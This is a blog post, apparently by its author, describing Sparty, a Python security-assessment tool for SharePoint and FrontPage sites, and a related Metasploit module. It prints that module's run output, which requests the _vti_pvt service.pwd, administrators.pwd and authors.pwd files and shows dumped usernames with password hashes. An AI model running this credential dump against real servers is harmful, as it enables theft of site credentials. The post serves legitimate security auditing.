Sparty : Useful Tools Die Hard !

Sparty was designed to conduct efficient security assessment of MS Sharepoint deployments. The tool has been used by security community which shows the acceptability and and highlighting that the tool is useful.

Sparty was presented at BlackHat 2013 and the presentation is available at:


Sparty is an open source tool written in python to audit web applications using Sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of Sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.

The tool is hosted here:

Sparty has been enhanced by other researchers as well. Links are presented below. added then support for “NTLM Authentication” which was good enhancement to test for authenticated Ms Sharepoint deployments.

More details here:

Further, the Sparty source code has also been used to draft an “Auxiliary Scanner” Metasploit Framework for the vulnerability reported many years ago. Details are presented below:


Metasploit Framework Module —

The msf module works (referenced from: ) as shown below:

msf auxiliary(scanner/http/frontpage_credential_dump) > run[*] Requesting: /about/_vti_pvt/service.pwd

[*] Found /about/_vti_pvt/service.pwd.
[*] Found FrontPage credentials.
[+] — service.pwd
[*] Requesting: /about/_vti_pvt/administrators.pwd
[*] Found /about/_vti_pvt/administrators.pwd.
[*] Found FrontPage credentials.
[+] — administrators.pwd
[*] Requesting: /about/_vti_pvt/authors.pwd
[*] Found /about/_vti_pvt/authors.pwd.
[*] Found FrontPage credentials.
[+] — authors.pwdFrontPage


Source Username Password Hash
— — — — — — — — — — — — — —
Administrators xMyvw4d3c1oWY
Authors xMyvw4d3c1oWY
Service jLAsITPJ8AsaR

[*] Credentials saved in: /root/.msf4/loot/20180921124828_default_10.10.10.10_frontpage.creds_090555.txt

Rapid 7 has added the the auxillary scanner for “frontpage_credential_dump” considering the database entry as shown below:

Rapid 7: Auxiliary Scanner

Note: Thanks to all the researchers who further contributed to enhance the tool. Appreciate the fact that work has been credited as well.

Learn, Share and Enjoy !




Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Deploying an ASP.NET Core Web API on AWS Lambda

Which is The Best HTML Editor in 2022?

Which is The Best HTML Editor in 2022?


Wireguard — The new tunneling protocol

What is Sleep to Earn?


Martech PCX

Web3 and The Graph. Data and Applications

BSC Launcher Updated Tokenomics

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Aditya K Sood

Aditya K Sood

More from Medium

How to Write an Effective Pentest Report: 5 Key Sections

HTB Write-up: Brain*uck — HTTPS enum, Wordpress exploitation, Encrypting Ciphers & RSA key file

Boot Camp for Coffee Drinkers | Coffee Lover ☕😍

WMI Providers for Script Kiddies — TrustedSec